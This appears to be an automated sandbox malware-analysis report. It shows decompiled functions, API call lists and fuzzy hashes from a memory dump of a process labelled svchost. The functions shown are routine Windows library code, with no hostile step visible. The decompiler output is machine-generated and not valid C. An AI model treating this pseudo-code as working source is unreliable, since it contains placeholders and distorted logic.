    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 78%
    			E0047C0F8(int _a4, char* _a8, int _a12, short* _a16, int _a20, int _a24, signed int _a28) {
    				int _v8;
    				intOrPtr _v20;
    				short* _v28;
    				short _v32;
    				int _v36;
    				short* _v40;
    				void* _v56;
    				int _t31;
    				int _t32;
    				int _t37;
    				int _t43;
    				int _t44;
    				int _t45;
    				void* _t53;
    				short* _t60;
    				int _t61;
    				intOrPtr _t62;
    				short* _t63;
    
    				_push(0xffffffff);
    				_push(0x49e260);
    				_push(E00472CF4);
    				_push( *[fs:0x0]);
    				 *[fs:0x0] = _t62;
    				_t63 = _t62 - 0x18;
    				_v28 = _t63;
    				_t31 =  *0x4e1a04; // 0x1
    				if(_t31 != 0) {
    					L6:
    					if(_t31 != 2) {
    						if(_t31 != 1) {
    							goto L18;
    						} else {
    							if(_a20 == 0) {
    								_t44 =  *0x4e19e4; // 0x0
    								_a20 = _t44;
    							}
    							asm("sbb eax, eax");
    							_t37 = MultiByteToWideChar(_a20, ( ~_a28 & 0x00000008) + 1, _a8, _a12, 0, 0);
    							_v36 = _t37;
    							if(_t37 == 0) {
    								goto L18;
    							} else {
    								_v8 = 0;
    								E00471390(_t37 + _t37 + 0x00000003 & 0x000000fc, _t53);
    								_v28 = _t63;
    								_t60 = _t63;
    								_v40 = _t60;
    								E004733C0(_t60, 0, _t37 + _t37);
    								_v8 = _v8 | 0xffffffff;
    								if(_t60 == 0) {
    									goto L18;
    								} else {
    									_t43 = MultiByteToWideChar(_a20, 1, _a8, _a12, _t60, _v36);
    									if(_t43 == 0) {
    										goto L18;
    									} else {
    										_t32 = GetStringTypeW(_a4, _t60, _t43, _a16);
    									}
    								}
    							}
    						}
    					} else {
    						_t45 = _a24;
    						if(_t45 == 0) {
    							_t45 =  *0x4e19d4; // 0x0
    						}
    						_t32 = GetStringTypeA(_t45, _a4, _a8, _a12, _a16);
    					}
    				} else {
    					_push( &_v32);
    					_t61 = 1;
    					if(GetStringTypeW(_t61, 0x49de2c, _t61, ??) == 0) {
    						if(GetStringTypeA(0, _t61, 0x49de28, _t61,  &_v32) == 0) {
    							L18:
    							_t32 = 0;
    						} else {
    							_t31 = 2;
    							goto L5;
    						}
    					} else {
    						_t31 = _t61;
    						L5:
    						 *0x4e1a04 = _t31;
    						goto L6;
    					}
    				}
    				 *[fs:0x0] = _v20;
    				return _t32;
    			}

    APIs
    • GetStringTypeW.KERNEL32(00000001,0049DE2C,00000001,-00000030,?,00000000,-00000030,?,?,004709C1,00000000,00418522,00000000), ref: 0047C137
    • GetStringTypeA.KERNEL32(00000000,00000001,0049DE28,00000001,?,?,?,004709C1,00000000,00418522,00000000), ref: 0047C151
    • GetStringTypeA.KERNEL32(-00000030,00418522,00000000,004709C1,?,?,00000000,-00000030,?,?,004709C1,00000000,00418522,00000000), ref: 0047C185
    • MultiByteToWideChar.KERNEL32(?,00000001,00000000,004709C1,00000000,00000000,?,00000000,-00000030,?,?,004709C1,00000000,00418522,00000000), ref: 0047C1BD
    • MultiByteToWideChar.KERNEL32(?,00000001,00000000,004709C1,?,?,?,?,?,?,?,004709C1,00000000,00418522), ref: 0047C213
    • GetStringTypeW.KERNEL32(00418522,?,00000000,?,?,?,?,?,?,?,?,004709C1,00000000,00418522), ref: 0047C225
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: StringType$ByteCharMultiWide
    • String ID:
    • API String ID: 3852931651-0
    • Opcode ID: 1884a599e59319acff80b73f8ee9721e3c69b16fc9a4bbc606121cd70c779922
    • Instruction ID: fe10e16db4adbd4e3886088c3cea5bf655331c077043bf0db1af16a4bda7053e
    • Opcode Fuzzy Hash: 1884a599e59319acff80b73f8ee9721e3c69b16fc9a4bbc606121cd70c779922
    • Instruction Fuzzy Hash: CA416D72901259AFCF208FA4DD85EEF3FA8FB19750F10893AF91596261C3388910DB99
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 80%
    			E00424BE0(void* __ecx, void* __ebp, void* __eflags, long _a4) {
    				int _v0;
    				int _v4;
    				intOrPtr _v8;
    				struct HDC__* _v12;
    				struct HDC__* _v20;
    				struct HDC__* _v28;
    				char _v32;
    				signed int _v36;
    				void* _v40;
    				struct HDC__* _v64;
    				struct HDC__* _v72;
    				char _v88;
    				void* _t27;
    				void* _t32;
    				struct HDC__* _t47;
    				void* _t70;
    				void* _t75;
    				void* _t81;
    				struct HDC__* _t84;
    
    				_t81 = __ebp;
    				_push(0xffffffff);
    				_push(E0048EF38);
    				_push( *[fs:0x0]);
    				 *[fs:0x0] = _t84;
    				_t47 = _a4;
    				_t75 = __ecx;
    				_t27 = E00424B50(__ecx, _t47);
    				_t70 = _t27;
    				if(_t70 != 0) {
    					E004892C7( &_v28);
    					_v4 = 0;
    					if(_t47 != 0) {
    						_t47 =  *(_t47 + 4);
    					}
    					if(E0048937E( &_v32, CreateCompatibleDC(_t47)) != 0) {
    						_push(_t81);
    						_t32 = SelectObject(_v28, _t70);
    						asm("sbb eax, eax");
    						BitBlt( *(_v8 + 4), _v4, _v0,  *((intOrPtr*)(_t75 + 0x98)) -  *((intOrPtr*)(_t75 + 0x90)),  *((intOrPtr*)(_t75 + 0x9c)) -  *((intOrPtr*)(_t75 + 0x94)),  ~( &_v40) & _v36, 0, 0, _a4);
    						SelectObject(_v72, _t32);
    						DeleteObject(_t70);
    						_v64 = 0xffffffff;
    						E004893FC( &_v88);
    						 *[fs:0x0] = _v72;
    						return 1;
    					} else {
    						DeleteObject(_t70);
    						_v12 = 0xffffffff;
    						E004893FC( &_v36);
    						 *[fs:0x0] = _v20;
    						return 0;
    					}
    				} else {
    					 *[fs:0x0] = _v12;
    					return _t27;
    				}
    			}

    APIs
      • Part of subcall function 00424B50: CreateDIBitmap.GDI32(?,?,00000004,?,?,00000000), ref: 00424BCB
    • CreateCompatibleDC.GDI32(?), ref: 00424C3A
    • DeleteObject.GDI32(00000000), ref: 00424C4F
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Create$BitmapCompatibleDeleteObject
    • String ID:
    • API String ID: 3709961035-0
    • Opcode ID: f58c7f9419fbfd684d7ed82202486fcf59cdde92d2ada33c4c588edd07d3a7e6
    • Instruction ID: a2b92118ead697f1e460a60a56a68714c4d1e2cbe52dc9b653d32e06bd616b3b
    • Opcode Fuzzy Hash: f58c7f9419fbfd684d7ed82202486fcf59cdde92d2ada33c4c588edd07d3a7e6
    • Instruction Fuzzy Hash: 02318D72204741ABC314DF69D984F6BB7E8FBC8720F044A2EF55983291CB38A805CB65
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 40%
    			E0048CA4F(long* __ecx, signed int _a4, intOrPtr _a8) {
    				void* _v8;
    				void* _t28;
    				void* _t34;
    				void* _t35;
    				void* _t41;
    				signed int* _t47;
    				void* _t60;
    				long* _t63;
    
    				_push(__ecx);
    				_t63 = __ecx;
    				_t60 = TlsGetValue( *__ecx);
    				if(_t60 == 0) {
    					_t28 = E0048C815(0x10);
    					if(_t28 == 0) {
    						_t60 = 0;
    					} else {
    						 *_t28 = 0x49ccc0;
    						_t60 = _t28;
    					}
    					 *(_t60 + 8) =  *(_t60 + 8) & 0x00000000;
    					 *(_t60 + 0xc) =  *(_t60 + 0xc) & 0x00000000;
    					_t8 = _t60 + 8; // 0x8
    					_t47 = _t8;
    					_t9 =  &(_t63[7]); // 0x4e1438
    					_v8 = _t60;
    					 *0x49224c(_t9);
    					_t11 =  &(_t63[5]); // 0x4e1430
    					_t50 = _t11;
    					E0048C7BC(_t11, _t60);
    					_t12 =  &(_t63[7]); // 0x4e1438
    					 *0x492250(_t12);
    					goto L8;
    				} else {
    					_t2 = _t60 + 8; // 0x8
    					_t47 = _t2;
    					if(_a4 >=  *_t47 && _a8 != 0) {
    						L8:
    						_t34 =  *(_t60 + 0xc);
    						if(_t34 != 0) {
    							_t15 =  &(_t63[3]); // 0x4
    							_t50 =  *_t15 << 2;
    							_t35 = LocalReAlloc(_t34,  *_t15 << 2, 2);
    						} else {
    							_t14 =  &(_t63[3]); // 0x4
    							_t35 = LocalAlloc(0,  *_t14 << 2);
    						}
    						 *(_t60 + 0xc) = _t35;
    						if(_t35 == 0) {
    							E00481443(_t50);
    						}
    						_t17 =  &(_t63[3]); // 0x4
    						E004733C0( *(_t60 + 0xc) +  *_t47 * 4, 0,  *_t47 * 0x3fffffff +  *_t17 << 2);
    						_t21 =  &(_t63[3]); // 0x4
    						 *_t47 =  *_t21;
    						TlsSetValue( *_t63, _t60);
    					}
    				}
    				_t41 =  *(_t60 + 0xc);
    				 *((intOrPtr*)(_t41 + _a4 * 4)) = _a8;
    				return _t41;
    			}

    APIs
    • TlsGetValue.KERNEL32(004E141C,004E140C,00000000,?,004E141C,?,0048CCB7,004E140C,00000000,?,?,00483860,?,0040AB42,000007DD), ref: 0048CA5A
    • RtlEnterCriticalSection.NTDLL(004E1438), ref: 0048CAA9
    • RtlLeaveCriticalSection.NTDLL(004E1438), ref: 0048CABC
    • LocalAlloc.KERNEL32(00000000,00000004,?,004E141C,?,0048CCB7,004E140C,00000000,?,?,00483860,?,0040AB42,000007DD,?,00000000), ref: 0048CAD2
    • LocalReAlloc.KERNEL32(?,00000004,00000002,?,004E141C,?,0048CCB7,004E140C,00000000,?,?,00483860,?,0040AB42,000007DD), ref: 0048CAE4
    • TlsSetValue.KERNEL32(004E141C,00000000), ref: 0048CB20
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: AllocCriticalLocalSectionValue$EnterLeave
    • String ID:
    • API String ID: 4117633390-0
    • Opcode ID: 64e541c4e251bc67af59eaa027691656516683d0c65e4ac741d7ab8805b854aa
    • Instruction ID: 3a37cb211e279f544c40f33679720a82c672f40dd4499f81fe7e403223efab85
    • Opcode Fuzzy Hash: 64e541c4e251bc67af59eaa027691656516683d0c65e4ac741d7ab8805b854aa
    • Instruction Fuzzy Hash: 4D31BF31100609EFD728EF55C88AF6AB7E8FB44314F00C92AE516C7650DB74E919CB69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0048AE61(struct HWND__* _a4, struct HWND__** _a8) {
    				struct HWND__* _t6;
    				void* _t12;
    				struct HWND__** _t14;
    				struct HWND__* _t15;
    				struct HWND__* _t16;
    				struct HWND__* _t17;
    
    				_t17 = _a4;
    				_t16 = _t17;
    				if(_t17 != 0) {
    					L16:
    					if((GetWindowLongA(_t16, 0xfffffff0) & 0x40000000) == 0) {
    						L4:
    						_t15 = _t16;
    						_t6 = _t16;
    						if(_t16 == 0) {
    							L6:
    							if(_t17 == 0 && _t16 != 0) {
    								_t16 = GetLastActivePopup(_t16);
    							}
    							_t14 = _a8;
    							if(_t14 != 0) {
    								if(_t15 == 0 || IsWindowEnabled(_t15) == 0 || _t15 == _t16) {
    									 *_t14 =  *_t14 & 0x00000000;
    								} else {
    									 *_t14 = _t15;
    									EnableWindow(_t15, 0);
    								}
    							}
    							return _t16;
    						} else {
    							goto L5;
    						}
    						do {
    							L5:
    							_t15 = _t6;
    							_t6 = GetParent(_t6);
    						} while (_t6 != 0);
    						goto L6;
    					}
    					_t16 = GetParent(_t16);
    					L15:
    					if(_t16 == 0) {
    						goto L4;
    					}
    					goto L16;
    				}
    				_t12 = E0048AEFD();
    				if(_t12 != 0) {
    					L14:
    					_t16 =  *(_t12 + 0x1c);
    					goto L15;
    				}
    				_t12 = E0046F80D();
    				if(_t12 != 0) {
    					goto L14;
    				}
    				_t16 = 0;
    				goto L4;
    			}

    APIs
    • GetParent.USER32(?), ref: 0048AE94
    • GetLastActivePopup.USER32(?), ref: 0048AEA3
    • IsWindowEnabled.USER32(?), ref: 0048AEB8
    • EnableWindow.USER32(?,00000000), ref: 0048AECB
    • GetWindowLongA.USER32(?,000000F0), ref: 0048AEDD
    • GetParent.USER32(?), ref: 0048AEEB
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
    • String ID:
    • API String ID: 670545878-0
    • Opcode ID: 5a42f71a2cf0af0e629bb1ba9fdb8aa202a4a96ad83b4ed65d008e30e6972519
    • Instruction ID: 30190ed4f9c054cdba02bb56b7e973969262f3ba280db517999e5898c04bcccd
    • Opcode Fuzzy Hash: 5a42f71a2cf0af0e629bb1ba9fdb8aa202a4a96ad83b4ed65d008e30e6972519
    • Instruction Fuzzy Hash: DB11943268132257B6317A694D44B3F72989F64B61F050D67ED01A7310DBD8DC5193EF
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 72%
    			E00432350(void* __ecx, char _a4, char _a8) {
    				struct tagPOINT _v8;
    				intOrPtr _v12;
    				signed int _t18;
    				void* _t33;
    
    				_t33 = __ecx;
    				if(_a4 != __ecx || _a8 != 1) {
    					L6:
    					return E00484BEB(_t33);
    				} else {
    					GetCursorPos( &_v8);
    					ScreenToClient( *(_t33 + 0x1c),  &_v8);
    					_push(0);
    					_push( &_a8);
    					_push( &_a4);
    					_push( &_v8);
    					_t18 = E00432400(_t33) | 0xffffffff;
    					if(_v12 == _t18) {
    						if(_v8.x == _t18) {
    							goto L6;
    						} else {
    							SetCursor(LoadCursorA(0, 0x7f84));
    							return 1;
    						}
    					} else {
    						SetCursor(LoadCursorA(0, 0x7f85));
    						return 1;
    					}
    				}
    			}

    APIs
    • GetCursorPos.USER32(?), ref: 00432372
    • ScreenToClient.USER32(00000001,?), ref: 00432381
      • Part of subcall function 00432400: DPtoLP.GDI32(?,?,00000001), ref: 00432517
    • LoadCursorA.USER32(00000000,00007F85), ref: 004323B1
    • SetCursor.USER32(00000000), ref: 004323B8
    • LoadCursorA.USER32(00000000,00007F84), ref: 004323D7
    • SetCursor.USER32(00000000), ref: 004323DE
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Cursor$Load$ClientScreen
    • String ID:
    • API String ID: 789353160-0
    • Opcode ID: f3fde6d54fdecd29795aea7d12916171fb84c40c806c9123e4d854501c23d3fe
    • Instruction ID: 7a50c2b4b558166438255bca1e510b4095ce398bfac60761c2a63129300264df
    • Opcode Fuzzy Hash: f3fde6d54fdecd29795aea7d12916171fb84c40c806c9123e4d854501c23d3fe
    • Instruction Fuzzy Hash: 2B11A931504201BFC610DB64EE89F9F7368ABA4B11F00453FF54686280EAB8D949C7B7
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0048A866(struct HWND__* _a4) {
    				struct HWND__* _t3;
    				struct HWND__* _t7;
    				struct HWND__* _t9;
    				struct HWND__* _t11;
    
    				_t3 = GetFocus();
    				_t11 = _t3;
    				if(_t11 != 0) {
    					_t9 = _a4;
    					if(_t11 != _t9) {
    						if(E0048A70B(_t11, 3) != 0) {
    							L5:
    							if(_t9 == 0 || (GetWindowLongA(_t9, 0xfffffff0) & 0x40000000) == 0) {
    								L8:
    								return SendMessageA(_t11, 0x14f, 0, 0);
    							}
    							_t7 = GetParent(_t9);
    							_t3 = GetDesktopWindow();
    							if(_t7 != _t3) {
    								goto L8;
    							}
    						} else {
    							_t3 = GetParent(_t11);
    							_t11 = _t3;
    							if(_t11 != _t9) {
    								_t3 = E0048A70B(_t11, 2);
    								if(_t3 != 0) {
    									goto L5;
    								}
    							}
    						}
    					}
    				}
    				return _t3;
    			}

    APIs
    • GetFocus.USER32 ref: 0048A869
      • Part of subcall function 0048A70B: GetWindowLongA.USER32(00000000,000000F0), ref: 0048A71C
    • GetParent.USER32(00000000), ref: 0048A890
      • Part of subcall function 0048A70B: GetClassNameA.USER32(00000000,?,0000000A), ref: 0048A737
      • Part of subcall function 0048A70B: lstrcmpi.KERNEL32(?,combobox), ref: 0048A746
    • GetWindowLongA.USER32(?,000000F0), ref: 0048A8AB
    • GetParent.USER32(?), ref: 0048A8B9
    • GetDesktopWindow.USER32 ref: 0048A8BD
    • SendMessageA.USER32(00000000,0000014F,00000000,00000000), ref: 0048A8D1
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Window$LongParent$ClassDesktopFocusMessageNameSendlstrcmpi
    • String ID:
    • API String ID: 2818563221-0
    • Opcode ID: f4dff09f56319b917e454a2bb60453d9216cc43469ed69b0c4057b6734afef6d
    • Instruction ID: 9ce3e664a7b184b8411bcfbea3de375009d667f1b9d6bf592094088b95b2fa0f
    • Opcode Fuzzy Hash: f4dff09f56319b917e454a2bb60453d9216cc43469ed69b0c4057b6734afef6d
    • Instruction Fuzzy Hash: E3F0813164162136F22236255D88FBF62585F81B60F150937FA25A7280AB98DD13A7BF
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 42%
    			E0048A780(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
    				struct tagRECT _v20;
    				struct HWND__* _t22;
    
    				ClientToScreen(_a4,  &_a8);
    				_push(5);
    				_push(_a4);
    				while(1) {
    					_t22 = GetWindow();
    					if(_t22 == 0) {
    						break;
    					}
    					if(GetDlgCtrlID(_t22) == 0xffff || (GetWindowLongA(_t22, 0xfffffff0) & 0x10000000) == 0) {
    						L5:
    						_push(2);
    						_push(_t22);
    						continue;
    					} else {
    						GetWindowRect(_t22,  &_v20);
    						_push(_a12);
    						if(PtInRect( &_v20, _a8) != 0) {
    							return _t22;
    						}
    						goto L5;
    					}
    				}
    				return 0;
    			}

    APIs
    • ClientToScreen.USER32(?,?), ref: 0048A78F
    • GetWindow.USER32(?,00000005), ref: 0048A7A0
    • GetDlgCtrlID.USER32(00000000), ref: 0048A7A9
    • GetWindowLongA.USER32(00000000,000000F0), ref: 0048A7B8
    • GetWindowRect.USER32(00000000,?), ref: 0048A7CA
    • PtInRect.USER32(?,?,?), ref: 0048A7DA
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Window$Rect$ClientCtrlLongScreen
    • String ID:
    • API String ID: 1315500227-0
    • Opcode ID: 00aa574261bec83990b361e16fbf3eb1bc5b68cc18f681937182140a40bb976a
    • Instruction ID: 5542302c3d32a285f0899f395a76ada6a8ede07d9cc367b545ee20455361ca98
    • Opcode Fuzzy Hash: 00aa574261bec83990b361e16fbf3eb1bc5b68cc18f681937182140a40bb976a
    • Instruction Fuzzy Hash: 2C018F36500125BBEB11AB64DC08EAFB77CEF54B10F404433F91192160E7B8D9269B99
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E0046E090(signed int __ecx, signed int* _a4) {
    				char _v132;
    				intOrPtr _v136;
    				signed int _v140;
    				signed int _v144;
    				void _v148;
    				void* _v156;
    				struct HINSTANCE__* _t57;
    				signed int _t66;
    				void* _t71;
    				signed int _t76;
    				void* _t78;
    				signed int _t92;
    				signed int* _t97;
    				signed int _t113;
    				unsigned int _t115;
    				signed int _t116;
    				signed int _t120;
    				signed int _t122;
    				signed int _t124;
    				signed int _t125;
    				unsigned int _t131;
    				signed int _t132;
    				intOrPtr* _t138;
    				void* _t142;
    				signed int _t178;
    				void* _t179;
    				void* _t180;
    				void* _t182;
    				void* _t183;
    				signed int _t184;
    
    				_t97 = _a4;
    				_t184 = __ecx;
    				_t97[0x24] = 0;
    				_t97[0x49] = 0;
    				_t57 = GetModuleHandleA("KERNEL32.DLL");
    				if(_t57 != 0) {
    					_t138 = GetProcAddress(_t57, "GetVersionExA");
    					if(_t138 == 0) {
    						_t178 = GetVersion() & 0x000000ff;
    						_t97[2] = 0;
    						_t97[1] = 0;
    						_t97[0x26] = 0;
    						_t97[0x27] = 0;
    						 *_t97 = _t178;
    						_t97[3] = 4;
    						_t97[0x25] = _t178;
    						_t97[0x28] = 4;
    						asm("repne scasb");
    						_t179 =  &(_t97[4]) - 0xffffffff;
    						memcpy(_t179 + 0x175b75a, _t179, memcpy( &(_t97[0x29]), _t179, 0xffffffff << 2) & 0x00000003);
    						_t66 = E0046E5F0();
    						_t97[0x24] = _t66;
    						_t97[0x49] = _t66;
    						return 1;
    					} else {
    						memset( &_v148, 0, 0x25 << 2);
    						_v148 = 0x94;
    						_t71 =  *_t138( &_v148);
    						if(_t71 != 0) {
    							_t113 = _v148;
    							 *_t97 = _t113;
    							_t97[2] = _v140 & 0x0000ffff;
    							asm("repne scasb");
    							_t115 =  !(_t113 | 0xffffffff);
    							_t97[1] = _v144;
    							_t142 =  &(_t97[4]);
    							_t180 =  &_v132 - _t115;
    							_t116 = _t115 >> 2;
    							_t76 = memcpy(_t142, _t180, _t116 << 2);
    							_v156 = _t142;
    							_t78 = memcpy(_t180 + _t116 + _t116, _t180, _t76 & 0x00000003);
    							_t120 = 0;
    							if(_t78 != 1) {
    								if(_t78 != 2) {
    									if(_t78 != 3) {
    										goto L11;
    									} else {
    										_t97[3] = 5;
    										goto L18;
    									}
    								} else {
    									_t97[3] = 4;
    									_t120 = _t184;
    									_t92 = E0046E590(_t120,  &_v132);
    									_t97[0x24] = _t92;
    									_t97[0x49] = _t92;
    									goto L11;
    								}
    							} else {
    								_t120 = _t184;
    								_t97[3] = 3;
    								if(E0046E390(_t97) != 0) {
    									L10:
    									_t97[0x24] = 1;
    									_t97[0x49] = 1;
    								} else {
    									_t120 = _t184;
    									if(E0046E3D0(_t97) == 0) {
    										_t120 = _t184;
    										if(E0046E450(_t97) != 0) {
    											goto L10;
    										}
    									} else {
    										_t97[0x24] = 2;
    										_t97[0x49] = 2;
    									}
    								}
    								L11:
    								if(_v136 != 0) {
    									_t142 = _v156;
    									L18:
    									_t97[0x25] =  *_t97;
    									_t122 = _t97[2];
    									_t97[0x26] = _t97[1];
    									_t97[0x27] = _t122;
    									_t97[0x28] = _t97[3];
    									asm("repne scasb");
    									_t124 =  !(_t122 | 0xffffffff);
    									_t182 = _t142 - _t124;
    									_t125 = _t124 >> 2;
    									memcpy( &(_t97[0x29]), _t182, _t125 << 2);
    									return memcpy(_t182 + _t125 + _t125, _t182, _t124 & 0x00000003);
    								} else {
    									_t97[0x28] = 2;
    									_t97[3] = 3;
    									_t97[0x25] = 3;
    									_t97[0x26] = 0xa;
    									_t97[0x27] = 0;
    									asm("repne scasb");
    									_t131 =  !(_t120 | 0xffffffff);
    									_t183 = 0x4d9700 - _t131;
    									_t132 = _t131 >> 2;
    									return memcpy(_t183 + _t132 + _t132, _t183, memcpy( &(_t97[0x29]), _t183, _t132 << 2) & 0x00000003);
    								}
    							}
    						} else {
    							return _t71;
    						}
    					}
    				} else {
    					return 0;
    				}
    			}

    APIs
    • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,74715400,?,00000000), ref: 0046E0B8
    • GetProcAddress.KERNEL32(00000000,GetVersionExA), ref: 0046E0D7
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: AddressHandleModuleProc
    • String ID: GetVersionExA$KERNEL32.DLL
    • API String ID: 1646373207-579392977
    • Opcode ID: b9fd26a8452a3f5e6ee7d4593aeb7295229aa5203e7fef9d2564f7c2ea97ad05
